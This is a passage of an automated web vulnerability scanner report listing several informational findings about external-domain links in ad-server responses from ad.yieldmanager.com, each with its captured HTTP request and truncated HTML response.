Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0056.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:08:10 GMT
Pragma: no-cache
Content-Length: 1582
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317600488_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGljG9rgzAQxj-N7yRcEv8V2YvY1CJrZAXZ6KvSxDjbVeOipcVPvzBHv8CO4-73HM89mKYAUmEgUkagSECSFFOiYiwb2tQ-pGlKwziIAeOY-GOR1YxjKNh6o6I9-y2-4q8LuckTtjeLeksYunOEAmPFfTl9iwS
...[SNIP]...
ndhKI7UMEPc.l8ZC--307T4FHmkdx1jSZ7qvUDmUH3D6RM546nxqKhdabc6sbqsfUoD8Aj0Wx6fa6dikJYOa2k43M.ajsd7amvTXfsb53U9thqq53hapRz.AAkQ3I1,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600488_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317600488_HERE" border="0" alt=""></a>
...[SNIP]...
19.72. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMfNruO-TRCrTno9DEBATa0DCOhQ96J5lSm15cAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2618088274%26r%3D0%26s%3D2126909,74e35e9c-ed55-11e0-9bce-78e7d1fa05aa,1317601211017 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:20:11 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0355.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:20:11 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601211_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlT21rgzAQ.jV-k5D4PmQfYoMga8oKWaV-EU3idFXjoqPSX79slv6BHsfd8xzPPcchN4aSy8aPUIiQqKXnxMh1eOgEjd9ENozj2PVCP3Cg57v2nCUCEwQzvMt5cMT.QV7I24ZMJRE-Zht7jzC4EgA8pel1G33
...[SNIP]...
xcaF60lJza8.0ls.9q2-2yTJaLLSc1KcCiKyFXoCY5roCrwQyrRoOpNaJUy0bLubVc4kHLCW5qlJ0wLPDRH-e1wd04S72UuhqFGsrxZ6ilLluppRH0ihvFLyNhc6I=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601211_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601211_HERE" border="0" alt=""></a>
...[SNIP]...
19.73. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABrJf0pPuPRCvvfaOyucn1z-FM2wpgnGn-z1vnxAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2104624894%26r%3D0%26s%3D2126909,de26564e-ed54-11e0-8e49-78e7d162a0c4,1317600958120 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:16:28 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0045.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:16:28 GMT
Pragma: no-cache
Content-Length: 1582
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317600958_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlTctugzAQ.BpuyPIDiBHqwQ6iQg2oRKgRvSBinBICmBqq0Hx93RLlB7pa7cysZmcRCXxBoSSCui4mkLoiQASLDSZUQmzDIAg2HnF8BDG1p5jXLEQwZtuD8DL2V6EfvqzMzJCyLF7VK2XgGgLgKJ1c19VnQuH
...[SNIP]...
hfkrz4LnLepo9D9mTbzTyPFmEWjkzXYNZVLRegRjksQKjeLKuTBmNjTJGWJy2nxiKhAy3s3dQgz7VRnot-tTgafh4mqedSV0Ot-nL46o9Sl43U0hg6JYzjB55icoI=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317600958_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317600958_HERE" border="0" alt=""></a>
...[SNIP]...
19.74. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAfX7QfmeDRCvbPH57LuELEBGqvaKm7IBeQzdYHAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3684300767%26r%3D0%26s%3D2126909,4adc3378-ed53-11e0-bdd4-78e7d15fdc94,1317600281512 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:04:41 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0112.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:04:41 GMT
Pragma: no-cache
Content-Length: 1582
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317600281_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGljWFrgzAQhn-N3yQkMbEW2YfYYJE1ZQ5pmV9EkzhLq-mio8Vfv2zd.AM7jrv3PZ67Q0HcEklRA2uoG9WqUMUowHKFIknJ2odxHGOC6QqHmEJ.zBLFOIIZ2xxlmLOf4Gv-.FCu8ojl2cO9RAzcOADEWHF7jD5
...[SNIP]...
hSFuosikPvOLpfFtmT73fTdPUC5uHUpQKTrZW-A3PVwx1I07th3Vpw7RyUWt1aPXZewAn0cDibQZ-UcyFF3142Tp-GUdupsvWgTF8Nn32jbdVpqx1wMdIRX3Mvc5c=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317600281_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317600281_HERE" border="0" alt=""></a>
...[SNIP]...
19.75. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACR1LAcI-DRCphMPlklk7jLbEnRvvtGSzBTzJ5ZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D766431961%26r%3D0%26s%3D2126909,0474a802-ed53-11e0-8881-2f73f980d1ce,1317600163393 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:13 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0111.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:03:13 GMT
Pragma: no-cache
Content-Length: 1598
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317600163_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGlT9FqhDAQ.BrfJCSaakT6EC8VbE.tFenRexE1Ua89jY0WrV.fcB73A12W3ZlhdmCR7ROvRASV2PaKshSe5SPbqlzkOtwqTOj7PkYedl0CiWuOUcApQzCiu6fKOdBrMY-9bEhPRuhBbuyVUDAzALBU8bxJ3zG
...[SNIP]...
bMJxZ-nm4v6ftH02ynaTBsalihbg4mVXCxADmIfgGV7LRY1AoMrTaFStRKjK1hMwwNy1llL85cM-cBeppXpcbnfhRqylXRc9nl.U9XCpW3QgltuMhKO.4A.p9zpA==,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600163_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317600163_HERE" border="0" alt=""></a>
...[SNIP]...
19.76. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACDXCQRkeHRCvqpWfmi8NK.ACjreW7rGfGvgYOUAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D3491581095%26r%3D0%26s%3D2126909,deb80d06-ed53-11e0-ad42-78e7d1f5c942,1317600529578 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0295.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:08:50 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317600529_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGljNFugzAMRb-GNxQlBGgR2kNo1gmtmdYJrYIXRBNTurakC0ywfv2igvoDsyz7Xuv6EBrXQUigAkoVBhlVNCbUkwsiI0Kxi-M4posooBENfbdLE8U4wSlbPctwy-7FI.46KTv5km315N6XDA0cIV8bMUynb7H
...[SNIP]...
okdjnJbycsZo79f3Ldpu-vDmWOt7atUG8qBSPSV2hHJPXFHqvaoGtjQ2sDtYGucSj3seOFN93CUVkXBjiyXu6tPrYdmL40Vav0pWx.LnswZQMGbOCspU38ATXBc.M=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600529_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317600529_HERE" border="0" alt=""></a>
...[SNIP]...
19.77. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkMCV9Y-TRCprvrXcs8nJnK49wH2xEJffG.vUBAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3001353421%26r%3D0%26s%3D2126909,8d0fe198-ed55-11e0-915e-78e7d1f5d916,1317601251574 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:20:53 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0080.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:20:53 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601251_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlTctugzAQ.BpuyLLBvIR6MLGoUOOokWhQuSCwnRLxMDVUQfn6uiXKD2S12p0Zzc4iN.ZqWQsBQx41CCPoxch1eOAEUeSENozjGDsB9AyNkD1niSAUwYzsCu4fyX.RiL5tyEwakmO2sfeQgCsFACvNrpv0zUL
...[SNIP]...
eKT1TSbj3cc8z9i223yzJZLrGc1LQAi66FXIGa5LgCrgYj1mcNptaYUi3PWs6t5VIMLce.qVFehGG-h.44bwy-jLPUS6XrUaihGn-GRuqqlVoaQ6-4cfwCl4ZzMw==,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601251_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601251_HERE" border="0" alt=""></a>
...[SNIP]...
19.78. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwKNDZn-DRCqG9mY-4eQtB0RJtQeGno1w8e5joAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D2882591152%26r%3D0%26s%3D2126909,4e2c644e-ed53-11e0-aed4-78e7d1f549f4,1317600287071 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:04:47 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0336.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:04:47 GMT
Pragma: no-cache
Content-Length: 1582
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317600287_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGlTF1rgzAU.TW-SchNrFVkD7FZQdbIHDLXvhRN0lmqpksdlf76hTn8A7tc7vng3AM0qcNIwYoqAkAb1awToESuIVK1BB8nSQJRQAlgElL.lqWKccAZ2zzLsGC.w2P-MjN3ecQKM6vXiKE7RygwVtxn60tEeIn
...[SNIP]...
VUe8h51-fLI3vy.XYcrx5lHtm6VWi0tdITMlc9TEia3pn1yaJr60Jbq09W31qP8gB7JHyYQZ-VU-EKx07LxvHzcNN2PNp6UKY.Dt99o-2x1Va7QGekS.wAvLZzHA==,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600287_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317600287_HERE" border="0" alt=""></a>
...[SNIP]...
19.79. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

